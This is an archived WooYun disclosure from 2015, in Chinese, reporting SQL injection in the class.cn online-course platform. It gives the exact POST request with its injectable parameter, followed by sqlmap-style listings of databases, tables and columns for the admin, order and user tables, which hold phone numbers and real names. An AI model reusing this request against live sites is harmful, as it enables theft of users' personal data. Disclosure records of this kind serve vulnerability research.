乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-02: 细节已通知厂商并且等待厂商处理中 2015-07-07: 厂商已经主动忽略漏洞,细节向公众公开
好课网是中国教育在线的在线学习平台,该平台面向学习者提供涵盖基础教育、高等教育以及行业培训等海量优质网络课程,汇聚各行业精英,你可以自由选择你所需的或者感兴趣..
注入点
POST /ajax/course/list_course HTTP/1.1Content-Length: 188Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.class.cn:80/Host: www.class.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*all_course=1&sort=publishtime-desc&tags[0]=1*&type_id=19
包括50W+的师生姓名,手机号,身份证号,学生订单,且包括主站的信息
主站的数据
Database: eol_study2[88 tables]+-----------------------------------+| Study_Aboutfile || Study_Admin_Manage || Study_Coupon_Code || Study_Coupon_List || Study_Coupon_User_List || Study_Coupon_log || Study_Course || Study_CourseTmp || Study_Course_Check_Log || Study_Course_Comment || Study_Course_DelFile_Log || Study_Course_Live || Study_Course_LiveTmp || Study_Course_Note || Study_Course_Num || Study_Course_Scale || Study_Course_Section || Study_Course_SectionTmp || Study_Course_SectionTmp_Log || Study_Course_Section_Aboutfile || Study_Course_Section_Log || Study_Course_Section_Teacher || Study_Course_Section_Video || Study_Course_Section_VideoTmp || Study_Course_Section_VideoTmp_Log || Study_Course_Section_Video_Delete || Study_Course_Section_Video_Log || Study_Course_Total_Scale || Study_Course_Type || Study_Email_Send || Study_Interest || Study_Live_Callback_Log || Study_Live_Message_Log || Study_Live_Order_Log || Study_Message || Study_Message_Send || Study_My_Collect_Course || Study_My_Study_Course || Study_Open_Uid_Map || Study_Order || Study_Order_Audit_Log || Study_Order_Haoxue || Study_Order_Log || Study_Order_Log_Dezhi || Study_Order_Pay_Log || Study_Stat_AboutFile || Study_Stat_CourseHits || Study_Stat_CourseScales || Study_Stat_Course_Day || Study_Stat_Course_Month || Study_Stat_Course_Week || Study_Stat_File_Day || Study_Stat_File_Month || Study_Stat_File_Week || Study_Stat_Keywords || Study_Stat_Keywords_Day || Study_Stat_Keywords_Month || Study_Stat_Keywords_Search || Study_Stat_Keywords_Week || Study_Stat_UserComments || Study_Stat_UserHits || Study_Stat_User_Day || Study_Stat_User_Month || Study_Stat_User_Week || Study_Teacher || Study_User || Study_User_Check_Log || Study_User_Comment_Log || Study_User_Comment_Viewtime || Study_User_Interest_lk || Study_User_Msg || Study_User_Num || Study_User_Organization_Apply || Study_User_Organization_Applytmp || Study_User_Pay_Apply || Study_User_Pay_Applytmp || Study_User_Person_Apply || Study_User_Person_Applytmp || Study_User_Rakeback_Set || Study_User_Weibo || Study_Void_Generator || ci_sessions || class_active || class_cart || class_tag_course || class_tag_course_type || class_tag_list || daemon |+-----------------------------------+
Database: eol_study2Table: Study_Admin_Manage[8 columns]+-----------+-------------+| Column | Type |+-----------+-------------+| Id | int(11) || LastIp | varchar(20) || LastLogin | datetime || LoginNum | int(11) || Name | varchar(20) || PassWord | varchar(50) || Status | tinyint(4) || Suser | tinyint(4) |
50W+师生信息
Database: class_cn[94 tables]+---------------------------------------+| ci_sessions || class_active || class_admin_function || class_admin_group || class_admin_group_function || class_admin_member || class_admin_member_function || class_app_course_type || class_app_feedback || class_app_version || class_cart || class_ccback_section_filename || class_cooperation_order || class_coupon_list || class_coupon_op_log || class_coupon_public_code || class_coupon_single_code || class_coupon_user_list || class_course_amount || class_course_cc_video_undel || class_course_chapter || class_course_chapter_section || class_course_check || class_course_comment || class_course_detail || class_course_guide_doc || class_course_list || class_course_note || class_course_rate || class_course_rate_detail || class_course_section || class_course_section_check || class_course_section_guide_doc || class_course_section_multi || class_course_section_teacher || class_course_type || class_course_user_recommend || class_email_send || class_live_course || class_live_course_check || class_live_order || class_logs_coupon || class_logs_course_chapter_section_del || class_logs_course_check || class_logs_course_delfile || class_logs_course_section || class_logs_course_section_check_del || class_logs_course_section_multi_del || class_logs_course_update || class_logs_live_callback || class_logs_live_course || class_logs_live_course_del || class_logs_live_message || class_logs_order_charge_back || class_logs_order_check || class_logs_protocal_change || class_logs_transcoder || class_logs_user_change || class_logs_user_check || class_message || class_message_send || class_offline_protocol || class_open_uid_map || class_order || class_order_dezhi || class_order_haoxue || class_order_log || class_order_pay_log || class_promote_course || class_promote_course_check || class_promote_list || class_statistic_total || class_tag_course || class_tag_course_type || class_tag_list || class_user || class_user_comment || class_user_comment_viewtimes || class_user_favorites_course || class_user_msg || class_user_num || class_user_org_cert || class_user_org_cert_check || class_user_pay_request || class_user_pay_request_check || class_user_person_cert || class_user_person_cert_check || class_user_ratio_set || class_user_settle || class_user_settle_order || class_user_study_course || class_user_teacher || class_user_weibo || class_void_generator |+---------------------------------------+
订单详情
Database: class_cnTable: class_order[19 columns]+----------------+---------------------+| Column | Type |+----------------+---------------------+| back_time | datetime || close_pay | decimal(10,2) || close_status | tinyint(2) unsigned || close_time | datetime || course_id | int(11) unsigned || create_time | timestamp || create_user_id | int(11) unsigned || due_pay | decimal(10,2) || expend_type | tinyint(4) unsigned || ip | char(15) || is_back | tinyint(2) unsigned || oid | char(16) || order_status | tinyint(2) unsigned || order_user_id | int(11) unsigned || pay | decimal(10,2) || pay_flag | tinyint(3) unsigned || pay_time | datetime || source | tinyint(1) unsigned || void | bigint(20) |+----------------+---------------------+
用户信息
Database: class_cnTable: class_user[34 columns]+----------------+---------------------+| Column | Type |+----------------+---------------------+| bad_comment | int(11) unsigned || contact_email | varchar(50) || create_time | timestamp || email | varchar(100) || gender | enum('0','1','2') || good_comment | int(11) unsigned || head_img | varchar(200) || interest | varchar(1000) || intro | text || is_check | tinyint(2) || is_pub_email | tinyint(2) || is_pub_mobile | tinyint(2) || is_pub_qq | tinyint(2) || is_pub_tel | tinyint(2) || is_pub_website | tinyint(2) || is_pub_weibo | tinyint(2) || login_ip | varchar(20) || login_num | int(11) || login_time | datetime || mobile | char(11) || nick_name | varchar(100) || old_head_img | varchar(100) || pay_status | tinyint(2) unsigned || qq | varchar(20) || rand_code | varchar(32) || real_name | varchar(50) || source | varchar(10) || status | tinyint(2) || tel | varchar(20) || up_time | datetime || user_id | int(11) || user_type | tinyint(2) || website | varchar(200) || weibo | varchar(100) |+----------------+---------------------+
不知道
危害等级:无影响厂商忽略
忽略时间:2015-07-07 10:02
漏洞Rank:15 (WooYun评价)
2015-07-07:谢谢检查,我们尽快修复。
